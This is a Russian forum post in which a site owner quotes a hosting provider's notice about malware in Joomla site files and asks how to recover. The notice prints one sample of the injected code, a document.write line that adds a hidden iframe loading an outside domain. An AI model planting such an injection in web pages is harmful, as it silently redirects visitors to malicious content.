JustHost начал регистрировать вирусы вчера. Сообщение моего хостера (переведено):
Цитата |
---|
Уважаемый клиент,
Это уведомление сообщить вам, что мы обнаружили вредоносный код в файлы веб-сайта. Мы составили список зараженных файлов на вашем счету, а также вводится код ниже.
Для того, чтобы поддерживать безопасную среду размещения, мы будем автоматически корректируя эти скомпрометированы файлы на вашем счете, однако, следует помнить, что вы несете ответственность за проверку контента, размещенного в своем аккаунте в безопасности. Мы настоятельно рекомендуем вам обновить установленные скрипты и программного обеспечения, как устаревшие скриптов и программного обеспечения является наиболее часто используемым методом для доступа и получить контроль над целевой счет.
Если вам нужна помощь обновлению программного обеспечения на ваш хостинг аккаунт, пожалуйста, не стесняйтесь связаться с нашей службой поддержки.
JustHost.com поддержки
www.justhost.com
Служба поддержки: helpdesk.justhost.com/
Toll-Free: (888) 755-7585
Скомпрометирована файлы, обнаруженные являются:
/ home/ххх/public_html/ххх.ru/images/stories/.cache_tl8zas.php
/ home/ххх/public_html/хххn.ru/images/stories/story.php
Вредоносный код обнаружен похож на:
Перенаправление к следующей ссылке пример:
document.write ('<iframe src="activexscrutiny.org/Lexmark?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> </ IFRAME> ');
Хотя мы можем обнаружить и удалить эти компромиссы, это не обезопасить от дальнейших попыток взлома через тот же метод. Данный эксплойт по-видимому, связано с устаревшими версиями редактора JCE Joomla. Мы настоятельно рекомендуем обновить все экземпляры Joomla на ваш счет с последней версией редактора JCE, найти здесь:
extensions.joomla.org/extensions/edition/editors/88
С уважением,
JustHost Администраторы
[URL]Отменить изменения[/URL]
|
Остался не зараженным 1 сайт на Joomla Версия 1.5.15 (без JCE) - это не понятно. У меня заражены Joomla, как 1.5.26 (с JCE и без неё) и более ранние, так и 2.5.4. Ну да фиг с ними, т.к. вирус распространился на 1 статический HTML сайт, который не использует БД и CMS, но много JS.
Сайт на WordPress раздулся в три раза больше - видимо вирус плодится.
Сижу ничего не делаю - не могу никак начать - страшно, много работы!
Похоже некоторые справляются.
Читал, что:
- могут быть изменены файлы для заражения в будущем.
- могут быть украдены пароли.
Значит нужно по любому восстанавливать из бэкапов до 19 дек?
Интересно, распространяется ли зараза на саму CPanel?
Интересно, какие пароли ворует вирус?